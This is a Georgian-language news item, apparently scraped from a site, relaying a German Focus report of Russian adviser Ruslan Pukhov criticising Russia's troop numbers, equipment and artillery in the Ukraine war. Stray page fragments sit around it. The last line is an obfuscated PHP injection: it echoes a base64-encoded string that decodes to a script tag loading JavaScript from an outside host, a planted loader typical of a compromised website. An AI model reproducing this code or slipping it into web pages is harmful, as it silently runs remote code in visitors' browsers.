celsiusi
ავერსი საქკაბელი
გერმანული გამოცემა Focus–ი წერს, რომ რუსეთის თავდაცვის სამინისტროს მრჩეველთა საბჭოს წევრმა, სტრატეგიებისა და ტექნოლოგიების ანალიზის ცენტრის ხელმძღვანელმა რუსლან პუხოვმა მძიმე განცხადებები გააკეტა ინერვიუში.   
 
Focus–ი სტატიაში განმარტავს, რომ რუს ჟურნალისტთან ინტერვიუში პუხოვმა რუსული ჯარების მდგომარეობისა და აღჭურვილობის ცუდ სურათზე ვრცლად ისაუბრა. 
 
”ჩვენ ძალიან ცოტა ქვეითი ჯარისკაცი გვყავს, ფრონტის ხაზი დიდია და გაგზავნილი ჯარები არ არის საკმარისი.”– ამბობს პუხოვი. 
 
მისივე თქმით, უკრაინელები თავდაცვაზე არიან და ჰყავთ უამრავი არტილერია და სახმელეთო ძალები. 
 
„ჩვენ უნდა გავტეხოთ უკრაინის ფრონტის ხაზი ძალიან ცოტა ჯარისკაცით და დაუცველი ტანკებითა და სამხედრო მანქანებით. რუსული არმია ცდილობს ამ პრობლემის მოგვარებას არტილერიის მასიური გამოყენებით, მაგრამ პროგრესი ძალიან ნელია.”– ამბობს პუხოვი.
 
სტატიაში ნათქვამია, რომ მთლიანობაში, პუხოვი მკაცრად აკრიტიკებს არმიის აღჭურვილობას. რუსეთის არმიას არ ჰყავს უახლესი თაობის მოიერიშე თვითმფრინავები.
 
„ასევე, ჩვენ არ გვაქვს მაღალი სიზუსტის იარაღი. ეს ასევე ამცირებს ჩვენი მოძველებული თვითმფრინავების ეფექტურობას. სადღაც ასობით, თუნდაც ათასობით უმართავ რაკეტას ვისვრით. ისინი იაფია, მაგრამ ისინი ნამდვილად არ ხვდებიან ნიშნულს. მტრის ორი მაღალი სიზუსტის ჭურვი მნიშვნელოვნად მეტ ზიანს აყენებს. რვა წელია იბრძვიან, მათი არტილერია ძალიან გამოცდილია. ჩვენ, მეორე მხრივ, ძალზე იშვიათად ვიყენებდით ჩვენს არტილერიას ბრძოლის ველებზე. უკრაინელები უკეთ მომზადებულები არიან და საგრძნობლად უკეთესი საჰაერო დაზვერვაც აქვთ. ზაფხულის ბოლოს სიტუაცია შეიძლება დრამატული გახდეს ჩვენთვის. " - ეს არის მთავარი მიზეზი, რის გამოც რუსებმა ჯერ ვერ მოახერხეს საჰაერო სივრცის დაპყრობა – წერს გერმანული გამოცემა.
 
 
694
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");